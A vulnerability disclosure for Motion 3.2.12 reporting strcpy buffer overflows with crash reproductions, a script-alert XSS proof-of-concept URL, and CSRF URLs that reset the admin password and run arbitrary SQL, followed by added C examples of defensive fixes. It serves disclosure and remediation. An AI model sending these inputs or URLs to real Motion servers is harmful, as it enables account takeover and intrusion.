Motion - Bug Report 2013x 03x 07x 071831

BUG: Multiple Vulnerabilities

Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.

Buffer Overflows:

Supplying a long filename to the config and pid parameters of the "motion" binary will result in a buffer overflow. The cause of this is the unsafe C function strcpy(), where no boundary checking is done to prevent overflowing the buffer.
This in theory could be abused to escalate privileges if the suid/sgid flag is set on the motion binary (not default on most operating systems as far as I know).
Below is how to replicate the bugs:

# motion -c `python -c 'print "\x41"*1000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb6876045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb6874e1a]
/lib/i386-linux-gnu/libc.so.6(+0x10227f)[0xb687427f]
motion[0x804c0bb]
motion[0x8050e95]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb678b4d3]
motion[0x804b761]
Aborted



# motion -p /tmp/`python -c 'print "\x41"*5000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb68cf045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb68cde1a]
/lib/i386-linux-gnu/libc.so.6(+0x10214d)[0xb68cd14d]
motion[0x805012b]
motion[0x8050c00]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb67e44d3]
motion[0x804b761]
Aborted


Cross Site Scripting vulnerability:

It's possible to execute script code on the client-side browser through the "process_id_file" parameter.
The following Proof of Concept URL will display a popup with the text XSS:

http://<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Solution: Sanitise user input values


Cross Site Request Forgery:

The following URLs show that it's possible to reset a password or change the SQL query by sending a complete URL to the victim. If the victim clicks on the URL, it will execute the command without any further checking.
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword (Set admin password)
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)

See the following URL for more information on CSRF and solutions: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Environment

Motion version: 3.2.12
ffmpeg version:  
Shared libraries: ffmpeg
Server OS: Ubuntu 12.04
-- RvH - 07 Mar 2013
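
For the buffer overflows reported above, this is an added example (not part of the original report and not Motion's own code) of a length-checked replacement for the strcpy() pattern on the config and pid path arguments. The struct, the function names and the sample paths are hypothetical, and the buffer size of PATH_MAX is an assumption.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Hypothetical holder for the two path arguments named in the report. */
struct cli_paths {
    char conf_filename[PATH_MAX]; /* value of -c */
    char pid_file[PATH_MAX];      /* value of -p */
};

/*
 * Unsafe pattern the report describes: strcpy(dst, argument) copies until the
 * source's NUL byte, however small dst is.
 *
 * Checked copy: measure first and reject over-long input instead of
 * truncating it (a silently truncated path would name a different file).
 */
static int copy_path_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || dst_size == 0 || src == NULL) {
        errno = EINVAL;
        return -1;
    }
    len = strlen(src); /* argv strings are always NUL-terminated */
    if (len >= dst_size) {
        dst[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, src, len + 1); /* +1 copies the terminator as well */
    return 0;
}

/* Minimal -c / -p parser: returns 0 on success, -1 with errno set on error. */
static int parse_cli(int argc, char **argv, struct cli_paths *out)
{
    int i;

    out->conf_filename[0] = '\0';
    out->pid_file[0] = '\0';
    for (i = 1; i < argc; i++) {
        char *dst;

        if (strcmp(argv[i], "-c") == 0)
            dst = out->conf_filename;
        else if (strcmp(argv[i], "-p") == 0)
            dst = out->pid_file;
        else
            continue; /* other options are ignored in this sketch */
        if (i + 1 >= argc) { /* option given without a value */
            errno = EINVAL;
            return -1;
        }
        if (copy_path_checked(dst, PATH_MAX, argv[++i]) != 0)
            return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    struct cli_paths paths;

    if (parse_cli(argc, argv, &paths) != 0) {
        perror("path argument rejected");
        return 1;
    }
    printf("config=%s pid=%s\n", paths.conf_filename, paths.pid_file);
    return 0;
}
```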

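For the Cross Site Scripting and Cross Site Request Forgery findings above, this is an added example (not part of the original report and not Motion's own code) of a request gate for /config/set that refuses GET, requires a per-session token, and HTML-escapes the value before it is written into the page. All function names, the X-CSRF-Token-style header value, the token format and the `<li>` output shape are assumptions; the query string is taken as already URL-decoded.

```c
#include <stdio.h>
#include <string.h>

#define TOKEN_LEN 32 /* assumed length of the per-session anti-CSRF token */

enum verdict { REQ_OK, REQ_MALFORMED, REQ_DENY_METHOD, REQ_DENY_TOKEN };

/* Escape HTML metacharacters. Returns escaped length, or -1 if out is too small. */
static int html_escape(const char *in, char *out, size_t out_size)
{
    size_t used = 0;

    if (out_size == 0)
        return -1;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one; /* default: copy the byte unchanged */
        size_t n;

        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        n = strlen(rep);
        if (used + n >= out_size) { /* keep one byte for the terminator */
            out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* Compare tokens without an early exit on the first differing byte. */
static int token_ok(const char *supplied, const char *expected)
{
    unsigned char diff = 0;
    size_t i;

    if (supplied == NULL || strlen(supplied) != TOKEN_LEN ||
        strlen(expected) != TOKEN_LEN)
        return 0;
    for (i = 0; i < TOKEN_LEN; i++)
        diff |= (unsigned char)(supplied[i] ^ expected[i]);
    return diff == 0;
}

/* True for "/config/set" with an optional leading "/<thread number>". */
static int is_config_set(const char *path)
{
    if (path[0] == '/' && path[1] >= '0' && path[1] <= '9') {
        path++;
        while (*path >= '0' && *path <= '9')
            path++;
    }
    return strncmp(path, "/config/set", 11) == 0;
}

/* Gate one request and, if allowed, render the changed setting as escaped HTML. */
static enum verdict handle_request(const char *request_line, const char *csrf_header,
                                   const char *session_token, char *html, size_t html_size)
{
    char method[8], target[512], esc[1024];
    char *query;
    int n;

    if (html_size == 0)
        return REQ_MALFORMED;
    html[0] = '\0';
    if (sscanf(request_line, "%7s %511s", method, target) != 2)
        return REQ_MALFORMED;
    query = strchr(target, '?');
    if (query != NULL)
        *query++ = '\0';
    if (!is_config_set(target))
        return REQ_OK; /* pages that change nothing are out of scope here */
    if (strcmp(method, "POST") != 0)
        return REQ_DENY_METHOD; /* links and image loads issue GET */
    if (!token_ok(csrf_header, session_token))
        return REQ_DENY_TOKEN; /* cross-site forms can POST but lack the token */
    if (query == NULL || html_escape(query, esc, sizeof esc) < 0)
        return REQ_MALFORMED;
    n = snprintf(html, html_size, "<li>%s</li>", esc);
    return (n < 0 || (size_t)n >= html_size) ? REQ_MALFORMED : REQ_OK;
}

int main(void)
{
    char html[2048];
    /* Constructed token; the request line reuses the URL shown in the report. */
    enum verdict v = handle_request(
        "GET /0/config/set?control_authentication=admin:mypassword HTTP/1.1",
        NULL, "0123456789abcdef0123456789abcdef", html, sizeof html);
    printf("verdict=%d html=\"%s\"\n", (int)v, html);
    return 0;
}
```
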
Follow up

A fix for this is currently being pursued.

Fix record

Topic revision: r2 - 10 Oct 2014, MrDave